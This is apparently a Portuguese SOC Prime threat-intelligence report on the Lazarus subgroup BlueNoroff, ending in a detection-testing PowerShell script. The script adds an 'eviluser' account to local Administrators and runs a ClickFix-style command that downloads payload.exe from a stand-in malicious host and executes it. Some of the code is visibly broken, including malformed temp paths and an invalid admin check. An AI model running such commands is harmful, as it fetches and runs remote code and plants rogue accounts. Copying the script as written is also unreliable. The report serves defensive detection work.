SOC Prime Bias: Crítico

21 Jan 2026 15:58 UTC

Grupo BlueNoroff: O Braço de Cibercrime Financeiro do Lazarus

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
Grupo BlueNoroff: O Braço de Cibercrime Financeiro do Lazarus
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

BlueNoroff é um subgrupo do ecossistema Lazarus voltado para atividades financeiras, focando em operações de roubo de alto valor contra bancos, empresas de criptomoedas e alvos mais amplos da Web3. As táticas do grupo abrangem fraudes habilitadas por SWIFT, comprometimentos de watering-hole, envenenamento da cadeia de suprimentos de pacotes Go e caminhos de intrusão macOS construídos em torno de iscas de “entrevistas de emprego” falsas. Para alcançar execução e persistência, BlueNoroff mescla uma pilha de malware modular Rust/Go com AppleScript, VBScript e fluxos de engenharia social projetados para contornar a cautela do usuário e se misturar com atividades legítimas de desenvolvimento e administração.

Investigação

O relatório rastreia a trajetória do BlueNoroff desde o assalto ao Banco de Bangladesh em 2016 até atividades mais recentes da era 2025 na cadeia de suprimentos, destacando como as ferramentas e alvos do ator se expandiram junto com o ecossistema cripto/Web3. Pesquisadores delineiam padrões de infraestrutura e catalogam componentes de malware incluindo GhostCall, GhostHire, RustBucket e GillyInjector. A investigação também mapeia comportamentos observados no MITRE ATT&CK, abrangendo estágios como reconhecimento e acesso inicial, depois execução, persistência e roubo de credenciais, sublinhando uma ênfase consistente em manter discretos pontos de apoio, entrega planejada de cargas úteis e caminhos de acesso prontos para roubo.

Mitigação

Reduza a exposição apertando a higiene da cadeia de suprimentos: valide pacotes retirados de registros públicos, imponha controles de fixação e proveniência, e revise continuamente atualizações de dependências para mudanças inesperadas de mantenedores ou código. No macOS, fortaleça a governança de LaunchAgent/LaunchDaemon e monitore entradas de persistência suspeitas e ferramentas não assinadas. Bloqueie domínios semelhantes usados para entrega de iscas, imponha MFA para identidades privilegiadas e serviços expostos externamente, e operacionalize detecções para scripts, carregadores e técnicas de empacotamento maliciosas conhecidas associadas ao ator. Mantenha atualizações frequentes de inteligência de ameaças e reforçe o treinamento de usuários focado em phishing direcionado e padrões de engenharia social de “recrutadores/entrevistas de emprego”.

Resposta

Se indicadores de BlueNoroff forem descobertos, isole hosts afetados e preserve evidências chave, incluindo linhas de comando completas, conteúdo de scripts e binários soltos ou artefatos de pacotes. Bloqueie domínios maliciosos identificados e IPs de C2, então execute playbooks de resposta a incidentes alinhados a cenários de roubo de credenciais e comprometimento da cadeia de suprimentos. Implante ou ajuste detectores para cadeias de execução AppleScript e VBScript, e para padrões suspeitos de PowerShell apontados no relatório, depois amplie a caça para identificar endpoints adicionais expostos à mesma isca, dependência ou sobreposição de infraestrutura.

Fluxo de Ataque

Execução de Simulação

Pré-requisito: O Cheque de Telemetria & Linha de Base deve ter passado.

Racional: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a erros de diagnóstico.

  • Narrativa e Comandos do Ataque:

    1. Execução de AppleScript (T1546.016) – O adversário solta um payload.scpt malicioso no endpoint (por exemplo, via anexo de phishing). Usando um osascript.exe pré-instalado (incluído com uma ferramenta de terceiros), eles iniciam o script para executar uma carga de PowerShell que adiciona uma nova conta de administrador local.
    2. Entrega ClickFix de Área de Transferência (T1204.004) – O atacante copia um comando artesanal para a área de transferência que invoca curl com um agente de usuário no estilo Zoom para baixar uma carga de segunda etapa, em seguida, a executa imediatamente via cmd.exe. O comando também inclui uma chamada inline powershell.exe -c para executar a carga útil na memória.
  • Script de Teste de Regressão: O script abaixo reproduz ambos os comportamentos de forma determinística.

    #----- INÍCIO DO SCRIPT DE TESTE DE REGRESSÃO -----
    # Certifique-se de que estamos executando com privilégios administrativos
    if (-not ([Security.Principal.WindowsPrincipal] `
        [Security.Principal.WindowsBuiltInRole] "Administrator")) {
        Write-Error "Executar este script como Administrador."
        exit 1
    }
    
    # 1. Execução de AppleScript via osascript.exe
    $appleScriptPath = "$env:TEMPmalicious.scpt"
    Set-Content -Path $appleScriptPath -Value @"
    tell application "System Events"
        do shell script "powershell -c `"Add-LocalGroupMember -Group 'Administrators' -Member 'eviluser'`""
    end tell
    "@
    # Execute o AppleScript
    Start-Process -FilePath "osascript.exe" -ArgumentList "`"$appleScriptPath`"" -NoNewWindow -Wait
    
    # 2. Entrega ClickFix estilo área de transferência
    $clickFixCmd = 'curl -A "ZoomSDK" http://malicious.example.com/payload.exe -o $env:TEMPpayload.exe && powershell.exe -c "Start-Process $env:TEMPpayload.exe"'
    # Execute via cmd.exe para coincidir com a condição da regra
    Start-Process -FilePath "cmd.exe" -ArgumentList "/c `$clickFixCmd" -NoNewWindow -Wait
    
    # Limpeza: remova artefatos
    Remove-Item -Path $appleScriptPath -Force
    Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue
    # Fim do script
    #----- FIM DO SCRIPT DE TESTE DE REGRESSÃO -----
  • Comandos de Limpeza: Remova qualquer processo, arquivo e conta de usuário de teste remanescente.

    # Pare qualquer processo remanescente (defensivo – normalmente não é necessário)
    Get-Process -Name "osascript","cmd","powershell","payload" -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Exclua arquivos temporários
    Remove-Item -Path "$env:TEMPmalicious.scpt" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue
    
    # Remova a conta de administrador de teste se foi criada
    if (Get-LocalUser -Name "eviluser" -ErrorAction SilentlyContinue) {
        Remove-LocalUser -Name "eviluser"
    }